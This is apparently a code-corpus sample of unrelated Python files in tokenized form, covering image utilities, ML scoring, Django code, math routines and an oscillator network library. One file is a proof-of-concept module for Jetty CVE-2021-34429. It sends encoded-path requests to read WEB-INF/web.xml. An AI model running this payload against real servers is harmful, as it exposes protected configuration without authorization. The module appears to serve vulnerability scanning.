<import_stmt>os subprocess<line_sep>os.chdir(os.path.split(__file__)[0])<line_sep>subprocess.check_call(['python' 'test-c++.py'])<line_sep>subprocess.check_call(['python' 'test-go.py'])<line_sep>subprocess.check_call(['python' 'test-javascript.py'])<line_sep>subprocess.check_call(['python' 'test-markdowns.py'])<line_sep>
<import_stmt>io<import_from_stmt>pydantic confloat<import_from_stmt>PIL Image<import_stmt>numpy<as>np<import_stmt>imageio<import_stmt>logging<line_sep>Proportion=confloat(ge=0 le=1)<line_sep>log=logging.getLogger(__name__)<def_stmt>save_img im_array output_path<block_start>imageio.imwrite(output_path im_array)<block_end><def_stmt>numpy_to_png array:np.ndarray<arrow>str<block_start>"""Get a PNG string from a Numpy array. Args: array: A Numpy array of shape (w, h, 3) or (w, h), where the former is meant to become a three-channel image and the latter a one-channel image. The dtype of the array should be uint8. Returns: str """<line_sep>im=Image.fromarray(array)<line_sep>output=io.BytesIO()<line_sep>im.save(output 'png')<line_sep><return>output.getvalue()<block_end><def_stmt>png_to_numpy png:str dtype=np.uint8<arrow>np.ndarray<block_start>"""Get a Numpy array from a PNG string. Args: png: A str containing a PNG-formatted image. Returns: numpy.ndarray """<line_sep>incoming=io.BytesIO(png)<line_sep>im=Image.open(incoming)<line_sep><return>np.array(im)<block_end>
<import_stmt>io<import_stmt>numpy<as>np<import_stmt>os<import_from_stmt>azureml.core Model<import_from_stmt>azureml.contrib.services.aml_request rawhttp<import_from_stmt>azureml.contrib.services.aml_response AMLResponse<import_from_stmt>PIL Image<import_from_stmt>onnxruntimetriton InferenceSession<def_stmt>preprocess img scaling# , dtype): <block_start>"""Pre-process an image to meet the size, type and format requirements specified by the parameters. """<line_sep>c=3<line_sep>h=224<line_sep>w=224<line_sep>format="FORMAT_NCHW"<if_stmt>c<eq>1<block_start>sample_img=img.convert("L")<block_end><else_stmt><block_start>sample_img=img.convert("RGB")<block_end>resized_img=sample_img.resize((w h) Image.BILINEAR)<line_sep>resized=np.array(resized_img)<if_stmt>resized.ndim<eq>2<block_start>resized=resized[: : np.newaxis]<block_end># npdtype = triton_to_np_dtype(dtype) typed=resized.astype(np.float32)<line_sep># typed = resized <if_stmt>scaling<eq>"INCEPTION"<block_start>scaled=(typed/128)-1<block_end><elif_stmt>scaling<eq>"VGG"<block_start><if_stmt>c<eq>1<block_start>scaled=typed-np.asarray((128 ) dtype=npdtype)<block_end><else_stmt><block_start>scaled=typed-np.asarray((123 117 104) dtype=npdtype)<block_end><block_end><else_stmt><block_start>scaled=typed<block_end># Swap to CHW if necessary <if_stmt>format<eq>"FORMAT_NCHW"<block_start>ordered=np.transpose(scaled (2 0 1))<block_end><else_stmt><block_start>ordered=scaled<block_end># Channels are in RGB order. Currently model configuration data # doesn't provide any information as to other channel orderings # (like BGR) so we just assume RGB. <return>ordered<block_end><def_stmt>postprocess output_array<block_start>"""Post-process results to show the predicted label."""<line_sep>output_array=output_array[0]<line_sep>max_label=np.argmax(output_array)<line_sep>final_label=label_dict[max_label]<line_sep><return>f"{max_label} : {final_label}"<block_end><def_stmt>init <block_start><global>session label_dict<line_sep>session=InferenceSession(path_or_bytes="densenet_onnx")<line_sep>model_dir=os.path.join(os.environ["AZUREML_MODEL_DIR"] "models")<line_sep>folder_path=os.path.join(model_dir "triton" "densenet_onnx")<line_sep>label_path=os.path.join(model_dir "triton" "densenet_onnx" "densenet_labels.txt")<line_sep>label_file=open(label_path "r")<line_sep>labels=label_file.read().split("\n")<line_sep>label_dict=dict(enumerate(labels))<block_end>@rawhttp<async_keyword><def_stmt>run request<block_start>"""This function is called every time your webservice receives a request. Notice you need to know the names and data types of the model inputs and outputs. You can get these values by reading the model configuration file or by querying the model metadata endpoint. """<if_stmt>request.method<eq>"POST"<block_start>outputs=[]<for_stmt>output session.get_outputs()<block_start>outputs.append(output.name)<block_end>input_name=session.get_inputs()[0].name<line_sep>reqBody=<await>request.get_data()<line_sep>img=Image.open(io.BytesIO(reqBody))<line_sep>image_data=preprocess(img scaling="INCEPTION")<line_sep>res=session.run(outputs {input_name:image_data})<line_sep>result=postprocess(output_array=res)<line_sep><return>AMLResponse(result 200)<block_end><else_stmt><block_start><return>AMLResponse("bad request" 500)<block_end><block_end>
# Generated by Django 3.2.7 on 2021-10-15 08:15 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('resource_tracker' '0004_alter_resourcepoolattributedefinition_resource_pool') ]<line_sep>operations=[migrations.RenameField(model_name='resourcegroupattributedefinition' old_name='resource_group_definition' new_name='resource_group' ) migrations.RenameField(model_name='resourcegrouptextattributedefinition' old_name='resource_group_definition' new_name='resource_group' ) migrations.AlterUniqueTogether(name='resourcegroupattributedefinition' unique_together={('name' 'resource_group')} ) migrations.AlterUniqueTogether(name='resourcegrouptextattributedefinition' unique_together={('name' 'resource_group')} ) ]<block_end>
# ------------------------------------------------------------- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # ------------------------------------------------------------- # Autogenerated By : src/main/python/generator/generator.py # Autogenerated From : scripts/builtin/shortestPath.dml <import_from_stmt>typing Dict Iterable<import_from_stmt>systemds.operator OperationNode Matrix Frame List MultiReturn Scalar<import_from_stmt>systemds.script_building.dag OutputType<import_from_stmt>systemds.utils.consts VALID_INPUT_TYPES<def_stmt>shortestPath G:Matrix sourceNode:int **kwargs:Dict[str VALID_INPUT_TYPES]<block_start>""" :param The: G can be 0/1 (just specifying whether the nodes :param are: not) or integer values (representing the weight :param of: or the distances between nodes, 0 if not connected). :param maxi: Integer max number of iterations accepted (0 for FALSE, i.e. :param max: iterations not defined) :param sourceNode: index to calculate the shortest paths to all other nodes. :param verbose: flag for verbose debug output :return: 'OperationNode' containing minimum distance shortest-path from vertex i to vertex j. & of the minimum distance is infinity, the two nodes are """<line_sep>params_dict={'G':G 'sourceNode':sourceNode}<line_sep>params_dict.update(kwargs)<line_sep><return>Matrix(G.sds_context 'shortestPath' named_input_nodes=params_dict)<block_end>
# to compute modular power # Iterative Function to calculate # (x^y)%p in O(log y) <def_stmt>power x y p<block_start>res=1# Initialize result # Update x if it is more # than or equal to p x=x%p<while_stmt>(y<g>0)# If y is odd, multiply # x with result <block_start><if_stmt>((y&1)<eq>1)<block_start>res=(res<times>x)%p<block_end># y must be even now y=y<rshift>1# y = y/2 x=(x<times>x)%p<block_end><return>res<block_end>
<import_from_stmt>rest_framework generics<import_from_stmt>.models AssetInfo<import_from_stmt>.serializers AssetSerializer<import_from_stmt>rest_framework permissions<class_stmt>AssetList(generics.ListCreateAPIView)<block_start>queryset=AssetInfo.objects.all()<line_sep>serializer_class=AssetSerializer<line_sep>permission_classes=(permissions.AllowAny )<block_end><class_stmt>AssetDetail(generics.RetrieveUpdateDestroyAPIView)<block_start>queryset=AssetInfo.objects.all()<line_sep>serializer_class=AssetSerializer<line_sep>permission_classes=(permissions.AllowAny )<block_end>
<import_from_stmt>gazette.spiders.base.fecam FecamGazetteSpider<class_stmt>ScPescariaBravaSpider(FecamGazetteSpider)<block_start>name="sc_pescaria_brava"<line_sep>FECAM_QUERY='entidade:"Prefeitura Municipal de Pescaria Brava"'<line_sep>TERRITORY_ID="4212650"<block_end>
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Jetty Authorization Before Parsing and Canonicalization Variation''' "description":'''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''' "severity":"medium" "references":["https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" "cvss-score":"" "cve-id":"CVE-2021-34429" "cwe-id":"CWE-200"} "metadata":{"vuln-target":"" } "tags":["cve" "cve2021" "jetty"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/%u002e/WEB-INF/web.xml"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/.%00/WEB-INF/web.xml"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp1=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(resp1.status_code<eq>200)<and>("""</web-app>"""<in>resp1.text<and>"""java.sun.com"""<in>resp1.text)<and>("""application/xml"""<in>str(resp1.headers))<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
<import_stmt>numpy<as>np<import_stmt>random<import_from_stmt>q1_softmax softmax<import_from_stmt>q2_sigmoid sigmoid sigmoid_grad<import_from_stmt>q2_gradcheck gradcheck_naive<def_stmt>affine_forward x w b<block_start>""" Computes the forward pass for an affine (fully-connected) layer. The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N examples, where each example x[i] has shape (d_1, ..., d_k). We will reshape each input into a vector of dimension D = d_1 * ... * d_k, and then transform it to an output vector of dimension M. Inputs: - x: A numpy array containing input data, of shape (N, d_1, ..., d_k) - w: A numpy array of weights, of shape (D, M) - b: A numpy array of biases, of shape (M,) Returns a tuple of: - out: output, of shape (N, M) - cache: (x, w, b) """<line_sep>out=<none><line_sep>N=x.shape[0]<line_sep>D=np.prod(x.shape[1:])<line_sep>M=b.shape[1]<line_sep>out=np.dot(x.reshape(N D) w.reshape(D M))+b.reshape(1 M)<line_sep><return>out (x w b)<block_end><def_stmt>affine_backward dout cache<block_start>""" Computes the backward pass for an affine layer. Inputs: - dout: Upstream derivative, of shape (N, M) - cache: Tuple of: - x: Input data, of shape (N, d_1, ... d_k) - w: Weights, of shape (D, M) Returns a tuple of: - dx: Gradient with respect to x, of shape (N, d1, ..., d_k) - dw: Gradient with respect to w, of shape (D, M) - db: Gradient with respect to b, of shape (M,) """<line_sep>x,w,b=cache<line_sep>dx,dw,db=<none> <none> <none><line_sep>N=x.shape[0]<line_sep>D=np.prod(x.shape[1:])<line_sep>M=b.shape[1]<line_sep>dx=np.dot(dout w.reshape(D M).T).reshape(x.shape)<line_sep>dw=np.dot(x.reshape(N D).T dout).reshape(w.shape)<line_sep>db=np.sum(dout axis=0)<line_sep><return>dx dw db<block_end><def_stmt>sigmoid_forward x<block_start>""" Computes the forward pass for a sigmoid activation. Inputs: - x: Input data, numpy array of arbitary shape; Returns a tuple (out, cache) - out: output of the same shape as x - cache: identical to out; required for backpropagation """<line_sep><return>sigmoid(x) sigmoid(x)<block_end><def_stmt>sigmoid_backward dout cache<block_start>""" Computes the backward pass for an sigmoid layer. Inputs: - dout: Upstream derivative, same shape as the input to the sigmoid layer (x) - cache: sigmoid(x) Returns a tuple of: - dx: back propagated gradient with respect to x """<line_sep>x=cache<line_sep><return>sigmoid_grad(x)<times>dout<block_end><def_stmt>forward_backward_prop data labels params dimensions<block_start>""" Forward and backward propagation for a two-layer sigmoidal network Compute the forward propagation and for the cross entropy cost, and backward propagation for the gradients for all parameters. """<line_sep>### Unpack network parameters (do not modify) ofs=0<line_sep>Dx,H,Dy=(dimensions[0] dimensions[1] dimensions[2])<line_sep>N=data.shape[0]<line_sep>W1=np.reshape(params[ofs:ofs+Dx<times>H] (Dx H))<line_sep>ofs<augadd>Dx<times>H<line_sep>b1=np.reshape(params[ofs:ofs+H] (1 H))<line_sep>ofs<augadd>H<line_sep>W2=np.reshape(params[ofs:ofs+H<times>Dy] (H Dy))<line_sep>ofs<augadd>H<times>Dy<line_sep>b2=np.reshape(params[ofs:ofs+Dy] (1 Dy))<line_sep>### YOUR CODE HERE: forward propagation hidden=np.dot(data W1)+b1<line_sep>layer1_a=sigmoid(hidden)<line_sep>layer2=np.dot(layer1_a W2)+b2<line_sep># need to calculate the softmax loss probs=softmax(layer2)<line_sep>cost=-np.sum(np.log(probs[np.arange(N) np.argmax(labels axis=1)]))<line_sep>### END YOUR CODE ### YOUR CODE HERE: backward propagation #There is no regularization :/ # dx -> sigmoid -> W2 * layer1_a + b -> sigmoid -> W1 * data + b1 -> .. dx=probs.copy()<line_sep>dx<augsub>labels<line_sep>dlayer2=np.zeros_like(dx)<line_sep>gradW2=np.zeros_like(W2)<line_sep>gradW1=np.zeros_like(W1)<line_sep>gradb2=np.zeros_like(b2)<line_sep>gradb1=np.zeros_like(b1)<line_sep>gradW2=np.dot(layer1_a.T dx)<line_sep>gradb2=np.sum(dx axis=0)<line_sep>dlayer2=np.dot(dx W2.T)<line_sep>dlayer1=sigmoid_grad(layer1_a)<times>dlayer2<line_sep>gradW1=np.dot(data.T dlayer1)<line_sep>gradb1=np.sum(dlayer1 axis=0)<line_sep># Decided to implement affine (forward and backward function) # sigmoid (forward and backward function) # These should work properly; # scores, cache_1 = affine_forward(data, W1, b1) # scores, cache_s1 = sigmoid_forward(scores) # scores, cache_2 = affine_forward(scores, W2, b2) # # need to calculate the softmax loss # probs = softmax(scores) # cost = -np.sum(np.log(probs[np.arange(N), np.argmax(labels)] + 1e-12)) / N # softmax_dx = probs.copy() # softmax_dx[np.arange(N), np.argmax(labels,axis=1)] -= 1 # softmax_dx /= N # grads = {} # dlayer2, grads['W2'], grads['b2'] = affine_backward(softmax_dx, cache_2) # dlayer1s = sigmoid_backward(dlayer2, cache_s1) # dlayer1, grads['W1'], grads['b1'] = affine_backward(dlayer1s, cache_1) #softmax_dx is the gradient of the loss w.r.t. y_{est} ### END YOUR CODE ### Stack gradients (do not modify) grad=np.concatenate((gradW1.flatten() gradb1.flatten() gradW2.flatten() gradb2.flatten()))<line_sep><return>cost grad<block_end><def_stmt>sanity_check <block_start>""" Set up fake data and parameters for the neural network, and test using gradcheck. """<line_sep>print("Running sanity check...")<line_sep>N=300<line_sep>dimensions=[10 5 10]<line_sep>data=np.random.randn(N dimensions[0])# each row will be a datum labels=np.zeros((N dimensions[2]))<for_stmt>i range(N)<block_start>labels[i random.randint(0 dimensions[2]-1)]=1<block_end>params=np.random.randn((dimensions[0]+1)<times>dimensions[1]+(dimensions[1]+1)<times>dimensions[2] )<line_sep>#cost, _ = forward_backward_prop(data, labels, params, dimensions) # # expect to get 1 in 10 correct #print(np.exp(-cost)) # #cost is roughly correct gradcheck_naive(<lambda>params:forward_backward_prop(data labels params dimensions) params)<block_end><def_stmt>your_sanity_checks <block_start>""" Use this space add any additional sanity checks by running: python q2_neural.py This function will not be called by the autograder, nor will your additional tests be graded. """<line_sep>print("Running your sanity checks...")<line_sep>### YOUR CODE HERE #raise NotImplementedError ### END YOUR CODE <block_end><if_stmt>__name__<eq>"__main__"<block_start>sanity_check()<line_sep>your_sanity_checks()<block_end>
# -*-coding:utf8-*-# __author__='play4fun'<line_sep>""" create time:15-10-24 下午5:26 """<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('../data/contrast75.png' 0)<line_sep># flatten() 将数组变成一维 hist,bins=np.histogram(img.flatten() 256 [0 256])<line_sep># 计算累积分布图 cdf=hist.cumsum()<line_sep>## # 构建 Numpy 掩模数组 cdf 为原数组 当数组元素为 0 时 掩盖(计算时被忽略 cdf_m=np.ma.masked_equal(cdf 0)<line_sep>cdf_m=(cdf_m-cdf_m.min())<times>255/(cdf_m.max()-cdf_m.min())<line_sep># 对被掩盖的元素赋值,赋值为 0 cdf=np.ma.filled(cdf_m 0).astype('uint8')<line_sep>img2=cdf[img]<line_sep># cv2.imshow("img2",img2) # cv2.waitKey(0) ## # flatten() 将数组变成一维 hist,bins=np.histogram(img2.flatten() 256 [0 256])<line_sep># 计算累积分布图 cdf=hist.cumsum()<line_sep>cdf_normalized=cdf<times>hist.max()/cdf.max()<line_sep>plt.plot(cdf_normalized color='b')<line_sep>plt.hist(img.flatten() 256 [0 256] color='r')<line_sep>plt.xlim([0 256])<line_sep>plt.legend(('cdf' 'histogram') loc='upper left')<line_sep>plt.show()<line_sep>''' 直方图均 化经常用来使所有的图片具有相同的亮度条件的参考 工具。 在很多情况下 很有用。例如 脸 别 在 练分类器前 练 的所有图片 先 直方图均 化从而使它们 到相同的亮度条件。 '''<line_sep>
"""! @brief Neural and oscillatory network module. Consists of models of bio-inspired networks. @authors <NAME> (<EMAIL>) @date 2014-2020 @copyright BSD-3-Clause """<import_stmt>math<import_from_stmt>enum IntEnum<class_stmt>initial_type(IntEnum)<block_start>"""! @brief Enumerator of types of oscillator output initialization. """<line_sep>## Output of oscillators are random in line with gaussian distribution. RANDOM_GAUSSIAN=0<line_sep>## Output of oscillators are equidistant from each other (uniformly distributed, not randomly). EQUIPARTITION=1<block_end><class_stmt>solve_type(IntEnum)<block_start>"""! @brief Enumerator of solver types that are used for network simulation. """<line_sep>## Forward Euler first-order method. FAST=0# Usual calculation: x(k + 1) = x(k) + f(x(k)). ## Classic fourth-order Runge-Kutta method (fixed step). RK4=1<line_sep>## Runge-Kutta-Fehlberg method with order 4 and 5 (float step)." RKF45=2<block_end><class_stmt>conn_type(IntEnum)<block_start>"""! @brief Enumerator of connection types between oscillators. """<line_sep>## No connection between oscillators. NONE=0<line_sep>## All oscillators have connection with each other. ALL_TO_ALL=1<line_sep>## Connections between oscillators represent grid where one oscillator can be connected with four neighbor oscillators: right, upper, left, lower. GRID_FOUR=2<line_sep>## Connections between oscillators represent grid where one oscillator can be connected with eight neighbor oscillators: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right. GRID_EIGHT=3<line_sep>## Connections between oscillators represent bidirectional list. LIST_BIDIR=4<line_sep>## Connections are defined by user or by network during simulation. DYNAMIC=5<block_end><class_stmt>conn_represent(IntEnum)<block_start>"""! @brief Enumerator of internal network connection representation between oscillators. """<line_sep>## Each oscillator has list of his neighbors. LIST=0<line_sep>## Connections are represented my matrix connection NxN, where N is number of oscillators. MATRIX=1<block_end><class_stmt>network<block_start>"""! @brief Common network description that consists of information about oscillators and connection between them. """<line_sep>_num_osc=0<line_sep>_osc_conn=<none><line_sep>_conn_represent=<none><line_sep>__conn_type=<none><line_sep>__height=0<line_sep>__width=0<line_sep>@property<def_stmt>height self<block_start>"""! @brief Height of the network grid (that is defined by amout of oscillators in each column), this value is zero in case of non-grid structure. @note This property returns valid value only for network with grid structure. """<line_sep><return>self.__height<block_end>@property<def_stmt>width self<block_start>"""! @brief Width of the network grid, this value is zero in case of non-grid structure. @note This property returns valid value only for network with grid structure. """<line_sep><return>self.__width<block_end>@property<def_stmt>structure self<block_start>"""! @brief Type of network structure that is used for connecting oscillators. """<line_sep><return>self.__conn_type<block_end><def_stmt>__init__ self num_osc type_conn=conn_type.ALL_TO_ALL conn_repr=conn_represent.MATRIX height=<none> width=<none><block_start>"""! @brief Constructor of the network. @param[in] num_osc (uint): Number of oscillators in the network that defines size of the network. @param[in] type_conn (conn_type): Type of connections that are used in the network between oscillators. @param[in] conn_repr (conn_represent): Type of representation of connections. @param[in] height (uint): Number of oscillators in column of the network, this argument is used only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored. @param[in] width (uint): Number of oscillotors in row of the network, this argument is used only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored. """<line_sep>self._num_osc=num_osc<line_sep>self._conn_represent=conn_repr<line_sep>self.__conn_type=type_conn<if_stmt>conn_repr<is><none><block_start>self._conn_represent=conn_represent.MATRIX<block_end><if_stmt>(type_conn<eq>conn_type.GRID_EIGHT)<or>(type_conn<eq>conn_type.GRID_FOUR)<block_start><if_stmt>(height<is><not><none>)<and>(width<is><not><none>)<block_start>self.__height=height<line_sep>self.__width=width<block_end><else_stmt><block_start>side_size=self._num_osc<power>0.5<if_stmt>(side_size-math.floor(side_size)<g>0)<block_start><raise>NameError("Invalid number of oscillators '"+str(num_osc)+"' in the network in case of grid structure (root square should be extractable for the number of oscillators).")<line_sep><block_end>self.__height=int(side_size)<line_sep>self.__width=self.__height<block_end><if_stmt>self.__height<times>self.__width<ne>self._num_osc<block_start><raise>NameError('Width ('+str(self.__width)+') x Height ('+str(self.__height)+') must be equal to Size ('+str(self._num_osc)+') in case of grid structure')<line_sep><block_end><block_end>self._create_structure(type_conn)<block_end><def_stmt>__len__ self<block_start>"""! @brief Returns size of the network that is defined by amount of oscillators. """<line_sep><return>self._num_osc<line_sep><block_end><def_stmt>__create_connection self index1 index2<block_start><if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn[index1][index2]=<true><block_end><else_stmt><block_start>self._osc_conn[index1].append(index2)<line_sep><block_end><block_end><def_stmt>__create_all_to_all_connections self<block_start>"""! @brief Creates connections between all oscillators. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([<true>]<times>self._num_osc)<line_sep>self._osc_conn[index][index]=<false><block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([neigh<for>neigh range(0 self._num_osc 1)<if>index<ne>neigh])<line_sep><block_end><block_end><block_end><def_stmt>__create_grid_four_connections self<block_start>"""! @brief Creates network with connections that make up four grid structure. @details Each oscillator may be connected with four neighbors in line with 'grid' structure: right, upper, left, lower. """<line_sep>side_size=self.__width<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn=[[0]<times>self._num_osc<for>index range(0 self._num_osc 1)]<block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>index range(0 self._num_osc 1)]<block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of connections")<line_sep><block_end><for_stmt>index range(0 self._num_osc 1)<block_start>upper_index=index-side_size<line_sep>lower_index=index+side_size<line_sep>left_index=index-1<line_sep>right_index=index+1<line_sep>node_row_index=math.ceil(index/side_size)<if_stmt>(upper_index<ge>0)<block_start>self.__create_connection(index upper_index)<line_sep><block_end><if_stmt>(lower_index<l>self._num_osc)<block_start>self.__create_connection(index lower_index)<line_sep><block_end><if_stmt>((left_index<ge>0)<and>(math.ceil(left_index/side_size)<eq>node_row_index))<block_start>self.__create_connection(index left_index)<line_sep><block_end><if_stmt>((right_index<l>self._num_osc)<and>(math.ceil(right_index/side_size)<eq>node_row_index))<block_start>self.__create_connection(index right_index)<line_sep><block_end><block_end><block_end><def_stmt>__create_grid_eight_connections self<block_start>"""! @brief Creates network with connections that make up eight grid structure. @details Each oscillator may be connected with eight neighbors in line with grid structure: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right. """<line_sep>self.__create_grid_four_connections()<line_sep># create connection with right, upper, left, lower. side_size=self.__width<for_stmt>index range(0 self._num_osc 1)<block_start>upper_left_index=index-side_size-1<line_sep>upper_right_index=index-side_size+1<line_sep>lower_left_index=index+side_size-1<line_sep>lower_right_index=index+side_size+1<line_sep>node_row_index=math.floor(index/side_size)<line_sep>upper_row_index=node_row_index-1<line_sep>lower_row_index=node_row_index+1<if_stmt>((upper_left_index<ge>0)<and>(math.floor(upper_left_index/side_size)<eq>upper_row_index))<block_start>self.__create_connection(index upper_left_index)<line_sep><block_end><if_stmt>((upper_right_index<ge>0)<and>(math.floor(upper_right_index/side_size)<eq>upper_row_index))<block_start>self.__create_connection(index upper_right_index)<line_sep><block_end><if_stmt>((lower_left_index<l>self._num_osc)<and>(math.floor(lower_left_index/side_size)<eq>lower_row_index))<block_start>self.__create_connection(index lower_left_index)<line_sep><block_end><if_stmt>((lower_right_index<l>self._num_osc)<and>(math.floor(lower_right_index/side_size)<eq>lower_row_index))<block_start>self.__create_connection(index lower_right_index)<line_sep><block_end><block_end><block_end><def_stmt>__create_list_bidir_connections self<block_start>"""! @brief Creates network as bidirectional list. @details Each oscillator may be conneted with two neighbors in line with classical list structure: right, left. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([0]<times>self._num_osc)<line_sep>self._osc_conn[index][index]=<false><if_stmt>(index<g>0)<block_start>self._osc_conn[index][index-1]=<true><line_sep><block_end><if_stmt>(index<l>(self._num_osc-1))<block_start>self._osc_conn[index][index+1]=<true><block_end><block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>index range(self._num_osc)<block_start>self._osc_conn.append([])<if_stmt>(index<g>0)<block_start>self._osc_conn[index].append(index-1)<line_sep><block_end><if_stmt>(index<l>(self._num_osc-1))<block_start>self._osc_conn[index].append(index+1)<line_sep><block_end><block_end><block_end><block_end><def_stmt>__create_none_connections self<block_start>"""! @brief Creates network without connections. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>_ range(0 self._num_osc 1)<block_start>self._osc_conn.append([<false>]<times>self._num_osc)<block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>_ range(0 self._num_osc 1)]<line_sep><block_end><block_end><def_stmt>__create_dynamic_connection self<block_start>"""! @brief Prepare storage for dynamic connections. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>_ range(0 self._num_osc 1)<block_start>self._osc_conn.append([<false>]<times>self._num_osc)<block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>_ range(0 self._num_osc 1)]<line_sep><block_end><block_end><def_stmt>_create_structure self type_conn=conn_type.ALL_TO_ALL<block_start>"""! @brief Creates connection in line with representation of matrix connections [NunOsc x NumOsc]. @param[in] type_conn (conn_type): Connection type (all-to-all, bidirectional list, grid structure, etc.) that is used by the network. """<line_sep>self._osc_conn=list()<if_stmt>(type_conn<eq>conn_type.NONE)<block_start>self.__create_none_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.ALL_TO_ALL)<block_start>self.__create_all_to_all_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.GRID_FOUR)<block_start>self.__create_grid_four_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.GRID_EIGHT)<block_start>self.__create_grid_eight_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.LIST_BIDIR)<block_start>self.__create_list_bidir_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.DYNAMIC)<block_start>self.__create_dynamic_connection()<block_end><else_stmt><block_start><raise>NameError('The unknown type of connections')<line_sep><block_end><block_end><def_stmt>has_connection self i j<block_start>"""! @brief Returns True if there is connection between i and j oscillators and False - if connection doesn't exist. @param[in] i (uint): index of an oscillator in the network. @param[in] j (uint): index of an oscillator in the network. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><return>(self._osc_conn[i][j])<block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>neigh_index range(0 len(self._osc_conn[i]) 1)<block_start><if_stmt>(self._osc_conn[i][neigh_index]<eq>j)<block_start><return><true><line_sep><block_end><block_end><return><false><block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of coupling")<line_sep><block_end><block_end><def_stmt>set_connection self i j<block_start>"""! @brief Couples two specified oscillators in the network with dynamic connections. @param[in] i (uint): index of an oscillator that should be coupled with oscillator 'j' in the network. @param[in] j (uint): index of an oscillator that should be coupled with oscillator 'i' in the network. @note This method can be used only in case of DYNAMIC connections, otherwise it throws expection. """<if_stmt>(self.structure<ne>conn_type.DYNAMIC)<block_start><raise>NameError("Connection between oscillators can be changed only in case of dynamic type.")<line_sep><block_end><if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn[i][j]=<true><line_sep>self._osc_conn[j][i]=<true><block_end><else_stmt><block_start>self._osc_conn[i].append(j)<line_sep>self._osc_conn[j].append(i)<line_sep><block_end><block_end><def_stmt>get_neighbors self index<block_start>"""! @brief Finds neighbors of the oscillator with specified index. @param[in] index (uint): index of oscillator for which neighbors should be found in the network. @return (list) Indexes of neighbors of the specified oscillator. """<if_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><return>self._osc_conn[index]<line_sep># connections are represented by list. <block_end><elif_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><return>[neigh_index<for>neigh_index range(self._num_osc)<if>self._osc_conn[index][neigh_index]<eq><true>]<block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of connections")<line_sep><block_end><block_end><block_end>
